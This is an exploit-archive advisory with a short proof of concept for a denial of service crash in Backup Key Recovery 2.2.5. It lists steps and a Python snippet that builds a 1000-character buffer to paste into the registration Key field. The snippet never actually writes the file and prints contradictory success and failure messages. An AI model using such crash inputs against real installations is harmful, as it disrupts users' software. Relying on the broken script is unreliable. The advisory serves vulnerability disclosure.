Backup Key Recovery 2.2.5 Denial Of Service

Backup Key Recovery 2.2.5 suffers from a denial of service vulnerability.

MD5 | b4aea73276291c57590043aabd1a467c

# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage :
# Link Software :
# Tested on OS: Windows 10
# CVE : N/A

Proof of Concept (PoC):

1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.Backup Key Recovery Crashed


buffer = "A" * 1000

payload = buffer
print("[+] Creating %s bytes evil payload." %len(payload))
print("[+] File created!")
print("File cannot be created.")

Related Posts